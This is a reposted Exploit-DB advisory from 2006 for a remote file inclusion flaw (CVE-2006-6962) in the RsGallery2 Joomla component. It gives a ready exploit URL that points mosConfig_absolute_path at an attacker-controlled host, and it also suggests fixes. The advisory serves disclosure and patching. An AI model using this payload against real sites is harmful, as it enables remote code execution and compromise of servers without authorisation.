- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1959
- Проверка EDB
-
- Пройдено
- Автор
- MARRIOTTVN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6962
- Дата публикации
- 2006-06-28
Код:
RsGallery2 for Joomla
---------------------------------------------------------------------------
Discovered: marriottvn
Remote : Yes
Level : High
---------------------------------------------------------------------------
Affected software description :
Application : RsGallery2
version : latest version [ 1.11.2 ]
Description: component for joomla
URL: http://rsdev.nl
----------------------------------------------------------------------------
Vulnerable file :
rsgallery2.html.php
----------------------------------------------------------------------------
Exploit:
http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]
----------------------------------------------------------------------------
Fix:
1.Declare variabel $mosConfig_absolute_path
or
2.Add into the top function:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
----------------------------------------------------------------------------
Contact:
Nick: marriottvn
E-mail: i_love_lonely_girl[at]yahoo.com
Web: http://vnsecurity.com
Greetz to: VnRekcah
# milw0rm.com [2006-06-28]- Источник
- www.exploit-db.com
